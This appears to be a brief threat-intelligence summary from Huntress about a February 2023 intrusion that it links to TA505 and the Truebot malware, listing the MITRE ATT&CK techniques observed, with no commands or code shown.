Summary On 02 February 2023, an alert triggered in a Huntress-protected environment. At first glance, the alert itself was fairly generic - a combination of certutil using the urlcache flag to retrieve a remote resource and follow-on scheduled task creation - but further analysis revealed a more interesting set of circumstances. By investigating the event in question and pursuing root cause analysis (RCA), Huntress was able to link this intrusion to a recently-announced vulnerability as well as to a long-running post-exploitation framework linked to prominent ransomware groups.
ADVERSARY: TA505
MALWARE FAMILY: Truebot
ATT&CK IDS: T1190 - Exploit Public-Facing Application, T1203 - Exploitation for Client Execution, T1053.005 - Scheduled Task, T1036.004 - Masquerade Task or Service, T1553.002 - Code Signing, T1078.003 - Local Accounts, T1140 - Deobfuscate/Decode Files or Information, T1218.011 - Rundll32, T1071.001 - Web Protocols, T1105 - Ingress Tool Transfer, T1571 - Non-Standard Port, T1132.001 - Standard Encoding
Read More:
Comments